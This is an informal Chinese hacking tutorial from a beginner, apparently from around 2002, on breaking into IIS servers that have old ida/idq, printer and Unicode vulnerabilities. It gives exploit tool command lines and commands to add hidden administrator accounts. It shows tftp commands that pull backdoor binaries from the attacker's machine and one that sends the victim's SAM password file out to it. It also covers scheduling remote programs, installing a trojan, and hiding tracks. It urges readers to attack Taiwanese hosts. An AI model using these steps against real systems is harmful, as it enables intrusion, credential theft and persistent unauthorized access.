本菜鸟写的菜鸟教程
/ns/cn/jc/data/20020102130241.htm
目标:存在ida、idq、IIS5.0 NULL.Printer Exploit、Unicode编码漏洞的服务器(虽然都是老洞不过还是有不少啊)
准备工具:流光2914版 idahack.exe iis5hack.exe ntlm.exe srv.exe idq.dll ispc.exe tftpd32.exe最重要的是找个好马哈(以上程序建议放在c盘根目录,便于操作)
好,开始!
首先运行流光高级扫描检测项目只留:
CGI:全选
CGI Rules:只保留地一项
SQL:全选
IPC:保留1、3、5项
IIS:保留地一项
PLUGINS:保留
输入ip(不要拿国内的玩哈,就拿台湾的爽下哈)开扫,结果出来了哈
首先看扫描报告,寻找有ida、IIS5.0 NULL.Printer Exploit漏洞的机器
假设肉鸡ip:1.1.1.1
在命令行里依次输入:
idahakc 1.1.1.1 80 1 813
注意:其中“1”视对方系统版本情况选择1-14的数字
“813”是攻击成功后telnet连接的对方端口可以自己更改的,不过不要与已用端口冲突。
当显示 good luck :)时,你就可以telnet 对方ip 813进入肉鸡system32目录得到system权限
iis5hakc 1.1.1.1 80 1 813
注意:其中“1”视对方系统版本情况选择0-9的数字
“813”是攻击成功后telnet连接的对方端口可以自己更改的,不过不要与已用端口冲突。
当显示 good luck :)时,你就可以telnet 对方ip 813进入肉鸡system32目录得到system权限。
这时使用net命令就可以加用户和提升权限了
net user 1 2 /add 加个用户名是1密码是2的普通用户
net localgroup administrators 1 /add 把用户1提升为admini权限
再打个net start看他启动了哪些服务,碰上Terminal Services(3389),呵呵这个就不用我说了,要多方便有多方便了,如果开着telnet服务就可以直接telnet它了,也很实用哈,还可以加工一下:
用ipc连接它:
net use \\1.1.1.1\ipc$ 2 /user:1
提示:命令成功完成
上传ntlm.exe:
copy ntlm.exe \\1.1.1.1\admin$\system32
提示:已复制一个文件
停止肉鸡telnet:
net stop telnet
运行ntlm.exe:
提示:Done!
再启动肉鸡telnet:
net start telnet
现在用你加的用户就可以telnet 1.1.1.1它了,而且还不会留下痕迹!
好,回到流光主程序看有没有带Remote Execute-的机器(就是iis的Unicode编码漏洞),发现后用鼠标点击再点连接、确定现在就进入肉鸡scripts目录了,别急先打个dir命令看看是不是真进去了,ok,显示文件了!开始行动:
1;在本机打开tftpd32.exe,假设本机ip:8.8.8.8
回到流光iis远程命令行输入:
tftp -i 8.8.8.8 get srv.exe
是上传srv.exe到肉鸡scripts目录,然后在流光命令行里运行srv.exe
在本机命令行输入:
telnet 1.1.1.1 99
提示连接成功进入肉鸡system32目录,得到system权限
2;tftp -i 8.8.8.8 get idq.dll
上传idq.dll到肉鸡scripts目录
在本机命令行运行:
ispc 1.1.1.1/scripts/idq.dll
回车后进入肉鸡system32目录,得到system权限
3;也可以下肉鸡的sam到本机破解,以后就可以用肉鸡的用户登陆了
在命令行输入:
tftp -i 8.8.8.8 put c:\winnt\repair\sam(sam_.)
最后就是别忘了装个好马,方便以后再次进入!
补充:at命令的使用,前提是已与肉鸡建立ipc连接并用户有admini权限
首先在命令行输入
net time \\1.1.1.1
查看肉鸡系统时间假设显示下午08:08
at \\1.1.1.1 20:09 程序名
显示新加了一项作业,注意时间要按24小时换算!
at \\1.1.1.1
查看定时作业在不在,ok,看见了,一分钟后 所定程序按时运行!at命令还有很多,我就不多说了,自己琢磨吧!
以上文字纯属狂草,如有错误,嘿嘿不要骂俺哈!!!
我靠快2点了,得去陪老婆了,白!